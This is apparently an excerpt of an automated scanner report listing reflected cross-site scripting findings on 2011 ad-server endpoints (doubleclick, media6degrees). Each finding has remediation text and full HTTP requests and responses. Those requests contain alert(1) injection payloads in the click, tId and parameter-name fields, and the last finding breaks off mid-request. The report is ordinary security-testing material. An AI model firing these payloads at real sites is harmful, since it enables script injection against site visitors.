1.132. http://ad.doubleclick.net/adj/x1.rmx/discovercard/ron/chrome [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rmx/discovercard/ron/chrome

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d32f1'-alert(1)-'db921ef1f73 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rmx/discovercard/ron/chrome;click=d32f1'-alert(1)-'db921ef1f73 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABd2n4AAAAAAJ47IAAAAAAAAgHEAQIAAAAAAP8AAAACF3MOLwAAAAAAJFcQAAAAAAC2cioAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAACD.ZsmR0D8AAAAAAADgPwAg.2bJkdA.AAAAAAAA4D8AIP9myZHgPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqr.3wsyhSChO5NIUITUL5EI6ZvSaAnRprgrLyAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3937226629%26r%3D0%26s%3D1887835,04ab044a-a133-11e0-b5c3-1cc1de04b208
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 3286
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 03:02:39 GMT
Expires: Tue, 28 Jun 2011 03:02:39 GMT

document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Wed Feb 03 10:54:52 EST 2010 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
ercard.com/credit-cards/cardbuilder/index.html?iq_id=o1112';
var alttext = '';
var dcgif = 'http://s0.2mdn.net/1796512/CB728x90.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'd32f1'-alert(1)-'db921ef1f73http://discovercard.com/credit-cards/cardbuilder/index.html?iq_id=o1112';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/1796512/CB728x90.swf';
var dcminversion = '9';
var d
...[SNIP]...

1.133. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62ac5"-alert(1)-"553f8be859b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adserv/cs?tId=9141931727447453|cb=1309227831|adType=iframe|cId=7020|ec=1|spId=35731|advId=1245|exId=23|price=AAABMNQPUWpv6BqnAEfS1VfFyXUVlO77yhoqvw|pubId=118|secId=859|invId=1050|notifyServer=asd148.sd.pl.pvt|notifyPort=8080|bid=2.15|srcUrlEnc=http%3A%2F%2Fwww.marketbuy54.com&62ac5"-alert(1)-"553f8be859b=1 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acs=016020a0e0f0g0h1ll77mmxzt122csoxzt1271kbxzt1271kbxzt122csoxzt1271kb; ipinfo=2lnh7v60zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; adh=1lluut6160d5mnk030t601ewHAhOFkX01md2032u01vvqV0QK5K018qqm2mj01VqkN5H43s017kjb472e012mj01VqoCRKnha017kje59iw010t602U5VzBCfEH000duhMllYZOUL10000eh3j3r010t602Ux0lBKWOP000dnnNsf4RBHGo0002704kzp010t601OnK3JLpHn0003of3ftm010t601NLfLZBxCP0001cz5ga6010t601M1fYxCfX+0000sx4tm1010t601M0QkBMuNQ0000rt4qk0010t601Ms7JhMtyT0000l53ncx010t601MePkBCfDV00007s5awn010t601MbzDxPdaX00005k4th1010t601Mak3hDIUX00004g5gty010t601MVrdZPDCo000000; clid=2ll77mm01171voofy6a0tk1w2a31302h4y030r0460v; orblb=2ll8nk2072gh20u021a7x60opab0w010opc82k810v010xuvq23a10u010ps6m27y11e0109x0q2gu10u0300zeq00z1q00yg11zw10u0200z2400yjk1y510u0100000; rdrlst=43l0pi2lluuxo0000001m4y030klzlluuxo0000001m4y0318eclmxnyj0000000f4y031918lmuv1k0000000j4y030e0dlluuxo0000001m4y03190mlmzkg70000000e4y030e0klluyhn000000144y030d6hll8nk20000002g4y0318ljln2fci0000000c4y030mollluvl10000001c4y031aauln2fci0000000c4y03007jlluutb02i2z01o4y030e0rlluv110000001i4y030w9wlluutb0000001o4y0319drln2fci0000000c4y031196llkg95000000204y031195llnepl09y6p01x4y030bnelm6ifs0000000q4y031194lljpq30ogm30214y030bnhlm52500000000r4y0305grlmdlbx0000000n4y0301g3ll8nk20opc802g4y030j4wllv8nq000000104y0317y5lmxnyj0000000f4y031193llnesr0000001w4y031908lmvu190000000i4y03106yln390a0000000a4y031192lljn150dpv50224y030moxlluvec0000001e4y030dt1lluvec0000001e4y03114qlluutb0000001o4y030e6mll9m030000002b4y030e6llluv7p0000001g4y0318zsln2fci0000000c4y030kmmlluw66000000184y030qhxlne96x000000044y030kk3lluvm30000001a4y03159jlm523d0000000s4y030e5ylluvm30000001a4y0318k2ln2fci0000000c4y030wgclluutb0000001o4y0312anlluuxo0000001m4y0318s1lnailw000000054y030wgmllxcud0000000z4y030gjzlluv7p0000001g4y030m0tllv8gv000000124y030df3lluv110000001i4y030yc9lluv7p0000001g4y030yzxlluv110000001i4y0316e7ln2fci0000000c4y030wghllv8nq000000104y030gjqllv8nq000000104y03182jlmxnyj0000000f4y03167alluuyr0000001k4y030m9illuuyr0000001k4y030wgrlm522h0000000t4y030m0jllyfqo0000000x4y0319mblmxnyj0000000f4y03100xllo31q0000001u4y030obllluutb0000001o4y0317nolmxnyj0000000f4y0317gxlmxnyj0000000f4y030ycqlluvl10000001c4y03166wlluv7p0000001g4y031015lluutb0000001o4y030ycmlluv110000001i4y030klalluutb0000001o4y0318l6ln2fci0000000c4y030fyelnailw000000054y030na6llux09000000164y030yzblluutb0000001o4y030spbll9m030000002b4y03101ellrto10000001t4y0315ztll9l280000002c4y0317o3ln2fci0000000c4y0319f2lmxnyj0000000f4y030pdmlluuxo0000001m4y0318kgln2fci0000000c4y0318ktln2fci0000000c4y03101mllrttq0000001s4y0318rjln390a0000000a4y030yyslluuyr0000001k4y030n9qllxcud0000000z4y030m74lluyhn000000144y030m7elluvm30000001a4y03101ulluutb0000001o4y030lb4llux09000000164y030zp7lluuxo0000001m4y030yy9lluvec0000001e4y0318qgln390a0000000a4y030860lm2xlp0000000w4y030bq5lmivh80000000m4y030caglluutb0000001o4y0317szlmxnyj0000000f4y0308d4lm4som0000000v4y0300c6lluutb0000001o4y0310tyllkjwu0000001z4y030lb0lluvec0000001e4y0318pqln390a0000000a4y0311z0lluuxo0000001m4y030njjlluyhn000000144y030lazlluuyr0000001k4y030msvll9m030nqw702b4y0310telle7v60j5140244y0312enlluutb0000001o4y0310rdllikks1daf00234y030m3ullv8gv000000124y030wbqlluvm30000001a4y030m44lluw66000000184y0312llllneum0000001v4y0312lmlluutb0000001o4y030mj8lluv110000001i4y0310kylmivh80000000m4y0312qnllkonl0000001y4y030kn9lluv7p0000001g4y030bo8lmxnyj0000000f4y030mjilluuyr0000001k4y030dvalluvl10000001c4y030g9zlluw66000000184y0301hvll8nk20opc802g4y0316iell9m030000002b4y030ga6llux09000000164y0307vglluuyr0000001k4y030fclllv8gv000000124y030ph0lluutb0000001o4y0318h8lm51zz0000000u4y030o0ulluv110000001i4y030e15lluvl10000001c4y0317k1ln2fci0000000c4y03; sglst=21l0s9eslluut60000001p4y030r0460vef6lmq6u304o7h0014k000p00600ey7lmq6u30jdl700b4y030r0460b0ixlljn151e0xe0224y030r0460vefjlmq6u30jdl700k4y030r0460kdsolmq6u30jdl700e4u000q00600bzvllikks1yq2x0234y030r0460vexulmq6u30jdl700b4y030r0460bdlell9l281zzd202a4y030r0460vejelmq6u30d26700a4q000q00600e0vllnepl1m5pp01q4u000q006009uklljn151fxf201n4o000p0060090ill9m0327onm02b4y030r0460vbvdlljn151pxe50224y030r0460v56blljn151pxe501y4y030r0460gdz4lmq6u309dm40064o000p006001jzll8nk228n3n02g4y030r0460vecwlmq6u30d2670064q000q006003a6lm51zz1c8nq00u4y030r0460u5l3lluv0y0000001j4y030r0460vecklmq6u30jdl700f4y030r0460ff7wlmxnyj0bwgr00f4y030r0460ff7xlmq6u304o7h0014k000p00600ag2lle7v6232sj0244y030r0460vet0lmq6u30jdl70094u000q00600ekglmq6u304o7h0014k000p00600edxlmq6u30jdl70054u000q006005nkllnepl1c5qm01j4o000p006009mkllnepl1a98y01h4n000p00600awxln2fck0000000b4y030r0460bcwallnepl1c5qm01j4o000p00600ekzlmq6u30jdl700k4y030r0460kbo8lle7v61lcl101q4o000p00600b3jlmivh80yf6h00m4y030r0460m690lle7v61vck401q4y030r04607evalmq6u304o7h0014k000p00600ehslmq6u30jdl700k4y030r0460keyzlmxnyj01who0014o000p00600ebblmq6u30jdl700k4y030r0460keyylmq6u30d2670054q000q00600ef0lmq6u30jdl700f4y030r0460feyvlmq6u30jdl700b4y030r0460bes4lmq6u30jdl700k4y030r0460kfcclmxnyj0bwgr00f4y030r0460f9wvlljn151pxe50224y030r0460vf1wlmq6u30jdl700e4u000q00600eeplmq6u30jdl700k4y030r0460k0tille7v6232sj0244y030r0460ves0lmq6u30jdl70074y030r0460745mlluuyq0000001l4y030r0460verzlmxnyj0bwgr0094u000q006005jillnepl1c5qm01i4o000p00600ezblmxnyj01who0014o000p00600e0wlmq6u304o7h0014k000p00600ez9lmq6u30jdl70074y030r04607ee8lmq6u30jdl700e4u000q006009gellnepl1m5pp01r4u000q00600; vstcnt=418b010r1m4me19103210k24ehss103210c24nwh0103210u24fw8l103210t24fi35103210624fs4z103210z24ty31218e10i203210m24egq3218e10q203210x24fu9b218e10q203211024gcxb103210c24fclw103210x24f1fr103210c24omy7103210y24fn0j103210324b47b103210624uz3i10pm10t2459ao10321032455ue103210x24ncl2218e10q203210y24b1xk14tl21221624fu43103210c24wnrf218e115203250220620820921424ebm7103210k24fank103210324vx8f127p10224o5u1103211424tfmw1032100249ujm103210t2450o6103210024fub8103211024rylh103211124uyyu103211424n5kn20pm10c203210024eu86218e10p203210s24sqj810321002453dh103210324u1er218e200202203210324elor218e108203210a24k5jb10pn10c24ferm103211424ferl1032114248umb103210w24mwjf103210m24rm27218e108203210824hgi910321132496o0218e100203210024ef19103210w24p056103210024ep9z218e10q203210v24q28r218e108203210g24mtp4103210024j2vl103211024rcz8218e102203210624h6d7103211424ffmk103210024qqy7127p20020224qfys103210t24dx7s103210m2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lluut6160d5mnk030t602geonZLOWd01mfumewHAhOFkX01md2032u01vvqV0QK5K018qqm2mj01VqkN5H43s017kjb472e012mj01VqoCRKnha017kje59iw010t602U5VzBCfEH000duhMllYZOUL10000eh3j3r010t602Ux0lBKWOP000dnnNsf4RBHGo0002704kzp010t601OnK3JLpHn0003of3ftm010t601NLfLZBxCP0001cz5ga6010t601M1fYxCfX+0000sx4tm1010t601M0QkBMuNQ0000rt4qk0010t601Ms7JhMtyT0000l53ncx010t601MePkBCfDV00007s5awn010t601MbzDxPdaX00005k4th1010t601Mak3hDIUX00004g5gty010t601MVrdZPDCo000000; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:57 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w2a31b02k4y060r0760y; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:57 GMT; Path=/
Set-Cookie: orblb=2ll8nk2072gh20u021a7x60opab0w010opc82k810v010xuvq23a10u010ps6m27y11e0109x0q2gu10u0300zeq00z1q00yg11zw10u0200z2400yjk1y510u0100000; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:57 GMT; Path=/
Set-Cookie: rdrlst=43l0pi2lluuxo0000001p4y060klzlluuxo0000001p4y0618eclmxnyj0000000i4y060e0dlluuxo0000001p4y061918lmuv1k0000000m4y06190mlmzkg70000000h4y060e0klluyhn000000174y060d6hll8nk20000002j4y0618ljln2fci0000000f4y061aauln2fci0000000f4y060mollluvl10000001f4y060e0rlluv110000001l4y06007jlluutb02i2z01r4y060w9wlluutb0000001r4y0619drln2fci0000000f4y061196llkg95000000234y061195llnepl09y6p0204y060bnelm6ifs0000000t4y061194lljpq30ogm30244y060bnhlm52500000000u4y0605grlmdlbx0000000q4y0601g3ll8nk20opc802j4y060j4wllv8nq000000134y0617y5lmxnyj0000000i4y06106yln390a0000000d4y061908lmvu190000000l4y061193llnesr0000001z4y060moxlluvec0000001h4y061192lljn150dpv50254y060dt1lluvec0000001h4y060e6mll9m030000002e4y06114qlluutb0000001r4y060e6llluv7p0000001j4y0618zsln2fci0000000f4y060kmmlluw660000001b4y060qhxlne96x000000074y060kk3lluvm30000001d4y06159jlm523d0000000v4y0618k2ln2fci0000000f4y060e5ylluvm30000001d4y060wgclluutb0000001r4y0612anlluuxo0000001p4y060gjzlluv7p0000001j4y060wgmllxcud000000124y0618s1lnailw000000084y060df3lluv110000001l4y060m0tllv8gv000000154y060yc9lluv7p0000001j4y060yzxlluv110000001l4y0616e7ln2fci0000000f4y060wghllv8nq000000134y060gjqllv8nq000000134y06182jlmxnyj0000000i4y06167alluuyr0000001n4y060m9illuuyr0000001n4y060wgrlm522h0000000w4y060m0jllyfqo000000104y0619mblmxnyj0000000i4y06100xllo31q0000001x4y060obllluutb0000001r4y0617nolmxnyj0000000i4y0617gxlmxnyj0000000i4y060ycqlluvl10000001f4y06166wlluv7p0000001j4y061015lluutb0000001r4y060ycmlluv110000001l4y060klalluutb0000001r4y0618l6ln2fci0000000f4y060fyelnailw000000084y060na6llux09000000194y060yzblluutb0000001r4y060spbll9m030000002e4y06101ellrto10000001w4y0615ztll9l280000002f4y0617o3ln2fci0000000f4y0619f2lmxnyj0000000i4y060pdmlluuxo0000001p4y0618kgln2fci0000000f4y0618ktln2fci0000000f4y06101mllrttq0000001v4y0618rjln390a0000000d4y060yyslluuyr0000001n4y060n9qllxcud000000124y060m74lluyhn000000174y060m7elluvm30000001d4y06101ulluutb0000001r4y060lb4llux09000000194y060zp7lluuxo0000001p4y060yy9lluvec0000001h4y0618qgln390a0000000d4y060860lm2xlp0000000z4y060bq5lmivh80000000p4y060caglluutb0000001r4y0617szlmxnyj0000000i4y0608d4lm4som0000000y4y0600c6lluutb0000001r4y0610tyllkjwu000000224y060lb0lluvec0000001h4y0618pqln390a0000000d4y0611z0lluuxo0000001p4y060njjlluyhn000000174y060lazlluuyr0000001n4y060msvll9m030nqw702e4y0610telle7v60j5140274y0612enlluutb0000001r4y0610rdllikks1daf00264y060m3ullv8gv000000154y060wbqlluvm30000001d4y060m44lluw660000001b4y0612llllneum0000001y4y060mj8lluv110000001l4y0612lmlluutb0000001r4y0610kylmivh80000000p4y060kn9lluv7p0000001j4y0612qnllkonl000000214y060mjilluuyr0000001n4y060bo8lmxnyj0000000i4y060dvalluvl10000001f4y060g9zlluw660000001b4y0601hvll8nk20opc802j4y0616iell9m030000002e4y060ga6llux09000000194y0607vglluuyr0000001n4y060fclllv8gv000000154y0618h8lm51zz0000000x4y060ph0lluutb0000001r4y060e15lluvl10000001f4y060o0ulluv110000001l4y0617k1ln2fci0000000f4y06; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:57 GMT; Path=/
Set-Cookie: sglst=21l0s9eslluut60000001s4y060r0760yef6lmq6u304o7h0014k000p00600ey7lmq6u30jdl700e4y060r0760e0ixlljn151e0xe0254y060r0760yefjlmq6u30jdl700n4y060r0760ndsolmq6u30jdl700e4u000q00600bzvllikks1yq350264y060r0760yexulmq6u30jdl700e4y060r0760edlell9l281zzd202d4y060r0760yejelmq6u30d26700a4q000q00600e0vllnepl1m5pp01q4u000q006009uklljn151fxf201n4o000p0060090ill9m0327onu02e4y060r0760ybvdlljn151pxe50254y060r0760ydz4lmq6u309dm40064o000p0060056blljn151pxe50214y060r0760j1jzll8nk228n3v02j4y060r0760yecwlmq6u30d2670064q000q006003a6lm51zz1c8ny00x4y060r0760x5l3lluv0y0000001m4y060r0760yecklmq6u30jdl700i4y060r0760if7wlmxnyj0bwgr00i4y060r0760if7xlmq6u304o7h0014k000p00600ag2lle7v6232sr0274y060r0760yet0lmq6u30jdl70094u000q00600ekglmq6u304o7h0014k000p00600edxlmq6u30jdl70054u000q006005nkllnepl1c5qm01j4o000p006009mkllnepl1a98y01h4n000p00600awxln2fck0000000e4y060r0760ecwallnepl1c5qm01j4o000p00600ekzlmq6u30jdl700n4y060r0760nbo8lle7v61lcl101q4o000p00600b3jlmivh80yf6p00p4y060r0760p690lle7v61vck401t4y060r0760aevalmq6u304o7h0014k000p00600ehslmq6u30jdl700n4y060r0760neyzlmxnyj01who0014o000p00600ebblmq6u30jdl700n4y060r0760neyylmq6u30d2670054q000q00600ef0lmq6u30jdl700i4y060r0760ieyvlmq6u30jdl700e4y060r0760ees4lmq6u30jdl700n4y060r0760nfcclmxnyj0bwgr00i4y060r0760i9wvlljn151pxe50254y060r0760yf1wlmq6u30jdl700e4u000q00600eeplmq6u30jdl700n4y060r0760n0tille7v6232sr0274y060r0760yes0lmq6u30jdl700a4y060r0760a45mlluuyq0000001o4y060r0760yerzlmxnyj0bwgr0094u000q006005jillnepl1c5qm01i4o000p00600ezblmxnyj01who0014o000p00600e0wlmq6u304o7h0014k000p00600ee8lmq6u30jdl700e4u000q00600ez9lmq6u30jdl700a4y060r0760a9gellnepl1m5pp01r4u000q00600; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:57 GMT; Path=/
Set-Cookie: vstcnt=418b010r1m4me19103210k24ehss103210c24nwh0103210u24fw8l103210t24fi35103210624fs4z103210z24ty31218e10i203210m24egq3218e10q203210x24fu9b218e10q203211024gcxb103210c24fclw103210x24f1fr103210c24fn0j103210324omy7103210y24b47b103210624uz3i10pm10t2459ao103210324ncl2218e10q203210y2455ue103210x24b1xk14tl21221624fu43103210c24wnrf218e115203250220620820921424ebm7103210k24vx8f127p10224fank103210324o5u1103211424tfmw1032100249ujm103210t2450o6103210024fub8103211024rylh103211124uyyu103211424n5kn20pm10c203210024eu86218e10p203210s24sqj810321002453dh103210324u1er218e200202203210324elor218e108203210a24k5jb10pn10c24ferm103211424ferl1032114248umb103210w24mwjf103210m24rm27218e108203210824hgi910321132496o0218e100203210024ef19103210w24p056103210024ep9z218e10q203210v24q28r218e108203210g24mtp4103210024j2vl103211024rcz8218e102203210624h6d7103211424qfys103210t24qqy7127p20020224ffmk103210024dx7s103210m2; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:57 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 28 Jun 2011 02:23:56 GMT
Connection: close
Content-Length: 2380

<IFRAME SRC="http://ad.doubleclick.net/adi/N4848.137909.MEDIA6DEGREES/B5113302.7;sz=300x250;click0=http://ad.media6degrees.com/adserv/clk?tId=9141931727447453|cId=7020|cb=1309227831|notifyPort=8080|ex
...[SNIP]...
<script language="JavaScript">
(new Image(0,0)).src = "http://audit.303br.net?anId=40&pubId=1050&advId=35731&campId=4222&vURL=http%3A%2F%2Fwww.marketbuy54.com&62ac5"-alert(1)-"553f8be859b=1";
</script>
...[SNIP]...

1.134. http://ad.media6degrees.com/adserv/cs [tId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The value of the tId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45282"-alert(1)-"e2957ef1876 was submitted in the tId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adserv/cs?tId=9141931727447453|cb=1309227831|adType=iframe|cId=7020|ec=1|spId=35731|advId=1245|exId=23|price=AAABMNQPUWpv6BqnAEfS1VfFyXUVlO77yhoqvw|pubId=118|secId=859|invId=1050|notifyServer=asd148.sd.pl.pvt|notifyPort=8080|bid=2.15|srcUrlEnc=http%3A%2F%2Fwww.marketbuy54.com45282"-alert(1)-"e2957ef1876 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acs=016020a0e0f0g0h1ll77mmxzt122csoxzt1271kbxzt1271kbxzt122csoxzt1271kb; ipinfo=2lnh7v60zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; adh=1lluut6160d5mnk030t601ewHAhOFkX01md2032u01vvqV0QK5K018qqm2mj01VqkN5H43s017kjb472e012mj01VqoCRKnha017kje59iw010t602U5VzBCfEH000duhMllYZOUL10000eh3j3r010t602Ux0lBKWOP000dnnNsf4RBHGo0002704kzp010t601OnK3JLpHn0003of3ftm010t601NLfLZBxCP0001cz5ga6010t601M1fYxCfX+0000sx4tm1010t601M0QkBMuNQ0000rt4qk0010t601Ms7JhMtyT0000l53ncx010t601MePkBCfDV00007s5awn010t601MbzDxPdaX00005k4th1010t601Mak3hDIUX00004g5gty010t601MVrdZPDCo000000; clid=2ll77mm01171voofy6a0tk1w2a31302h4y030r0460v; orblb=2ll8nk2072gh20u021a7x60opab0w010opc82k810v010xuvq23a10u010ps6m27y11e0109x0q2gu10u0300zeq00z1q00yg11zw10u0200z2400yjk1y510u0100000; rdrlst=43l0pi2lluuxo0000001m4y030klzlluuxo0000001m4y0318eclmxnyj0000000f4y031918lmuv1k0000000j4y030e0dlluuxo0000001m4y03190mlmzkg70000000e4y030e0klluyhn000000144y030d6hll8nk20000002g4y0318ljln2fci0000000c4y030mollluvl10000001c4y031aauln2fci0000000c4y03007jlluutb02i2z01o4y030e0rlluv110000001i4y030w9wlluutb0000001o4y0319drln2fci0000000c4y031196llkg95000000204y031195llnepl09y6p01x4y030bnelm6ifs0000000q4y031194lljpq30ogm30214y030bnhlm52500000000r4y0305grlmdlbx0000000n4y0301g3ll8nk20opc802g4y030j4wllv8nq000000104y0317y5lmxnyj0000000f4y031193llnesr0000001w4y031908lmvu190000000i4y03106yln390a0000000a4y031192lljn150dpv50224y030moxlluvec0000001e4y030dt1lluvec0000001e4y03114qlluutb0000001o4y030e6mll9m030000002b4y030e6llluv7p0000001g4y0318zsln2fci0000000c4y030kmmlluw66000000184y030qhxlne96x000000044y030kk3lluvm30000001a4y03159jlm523d0000000s4y030e5ylluvm30000001a4y0318k2ln2fci0000000c4y030wgclluutb0000001o4y0312anlluuxo0000001m4y0318s1lnailw000000054y030wgmllxcud0000000z4y030gjzlluv7p0000001g4y030m0tllv8gv000000124y030df3lluv110000001i4y030yc9lluv7p0000001g4y030yzxlluv110000001i4y0316e7ln2fci0000000c4y030wghllv8nq000000104y030gjqllv8nq000000104y03182jlmxnyj0000000f4y03167alluuyr0000001k4y030m9illuuyr0000001k4y030wgrlm522h0000000t4y030m0jllyfqo0000000x4y0319mblmxnyj0000000f4y03100xllo31q0000001u4y030obllluutb0000001o4y0317nolmxnyj0000000f4y0317gxlmxnyj0000000f4y030ycqlluvl10000001c4y03166wlluv7p0000001g4y031015lluutb0000001o4y030ycmlluv110000001i4y030klalluutb0000001o4y0318l6ln2fci0000000c4y030fyelnailw000000054y030na6llux09000000164y030yzblluutb0000001o4y030spbll9m030000002b4y03101ellrto10000001t4y0315ztll9l280000002c4y0317o3ln2fci0000000c4y0319f2lmxnyj0000000f4y030pdmlluuxo0000001m4y0318kgln2fci0000000c4y0318ktln2fci0000000c4y03101mllrttq0000001s4y0318rjln390a0000000a4y030yyslluuyr0000001k4y030n9qllxcud0000000z4y030m74lluyhn000000144y030m7elluvm30000001a4y03101ulluutb0000001o4y030lb4llux09000000164y030zp7lluuxo0000001m4y030yy9lluvec0000001e4y0318qgln390a0000000a4y030860lm2xlp0000000w4y030bq5lmivh80000000m4y030caglluutb0000001o4y0317szlmxnyj0000000f4y0308d4lm4som0000000v4y0300c6lluutb0000001o4y0310tyllkjwu0000001z4y030lb0lluvec0000001e4y0318pqln390a0000000a4y0311z0lluuxo0000001m4y030njjlluyhn000000144y030lazlluuyr0000001k4y030msvll9m030nqw702b4y0310telle7v60j5140244y0312enlluutb0000001o4y0310rdllikks1daf00234y030m3ullv8gv000000124y030wbqlluvm30000001a4y030m44lluw66000000184y0312llllneum0000001v4y0312lmlluutb0000001o4y030mj8lluv110000001i4y0310kylmivh80000000m4y0312qnllkonl0000001y4y030kn9lluv7p0000001g4y030bo8lmxnyj0000000f4y030mjilluuyr0000001k4y030dvalluvl10000001c4y030g9zlluw66000000184y0301hvll8nk20opc802g4y0316iell9m030000002b4y030ga6llux09000000164y0307vglluuyr0000001k4y030fclllv8gv000000124y030ph0lluutb0000001o4y0318h8lm51zz0000000u4y030o0ulluv110000001i4y030e15lluvl10000001c4y0317k1ln2fci0000000c4y03; sglst=21l0s9eslluut60000001p4y030r0460vef6lmq6u304o7h0014k000p00600ey7lmq6u30jdl700b4y030r0460b0ixlljn151e0xe0224y030r0460vefjlmq6u30jdl700k4y030r0460kdsolmq6u30jdl700e4u000q00600bzvllikks1yq2x0234y030r0460vexulmq6u30jdl700b4y030r0460bdlell9l281zzd202a4y030r0460vejelmq6u30d26700a4q000q00600e0vllnepl1m5pp01q4u000q006009uklljn151fxf201n4o000p0060090ill9m0327onm02b4y030r0460vbvdlljn151pxe50224y030r0460v56blljn151pxe501y4y030r0460gdz4lmq6u309dm40064o000p006001jzll8nk228n3n02g4y030r0460vecwlmq6u30d2670064q000q006003a6lm51zz1c8nq00u4y030r0460u5l3lluv0y0000001j4y030r0460vecklmq6u30jdl700f4y030r0460ff7wlmxnyj0bwgr00f4y030r0460ff7xlmq6u304o7h0014k000p00600ag2lle7v6232sj0244y030r0460vet0lmq6u30jdl70094u000q00600ekglmq6u304o7h0014k000p00600edxlmq6u30jdl70054u000q006005nkllnepl1c5qm01j4o000p006009mkllnepl1a98y01h4n000p00600awxln2fck0000000b4y030r0460bcwallnepl1c5qm01j4o000p00600ekzlmq6u30jdl700k4y030r0460kbo8lle7v61lcl101q4o000p00600b3jlmivh80yf6h00m4y030r0460m690lle7v61vck401q4y030r04607evalmq6u304o7h0014k000p00600ehslmq6u30jdl700k4y030r0460keyzlmxnyj01who0014o000p00600ebblmq6u30jdl700k4y030r0460keyylmq6u30d2670054q000q00600ef0lmq6u30jdl700f4y030r0460feyvlmq6u30jdl700b4y030r0460bes4lmq6u30jdl700k4y030r0460kfcclmxnyj0bwgr00f4y030r0460f9wvlljn151pxe50224y030r0460vf1wlmq6u30jdl700e4u000q00600eeplmq6u30jdl700k4y030r0460k0tille7v6232sj0244y030r0460ves0lmq6u30jdl70074y030r0460745mlluuyq0000001l4y030r0460verzlmxnyj0bwgr0094u000q006005jillnepl1c5qm01i4o000p00600ezblmxnyj01who0014o000p00600e0wlmq6u304o7h0014k000p00600ez9lmq6u30jdl70074y030r04607ee8lmq6u30jdl700e4u000q006009gellnepl1m5pp01r4u000q00600; 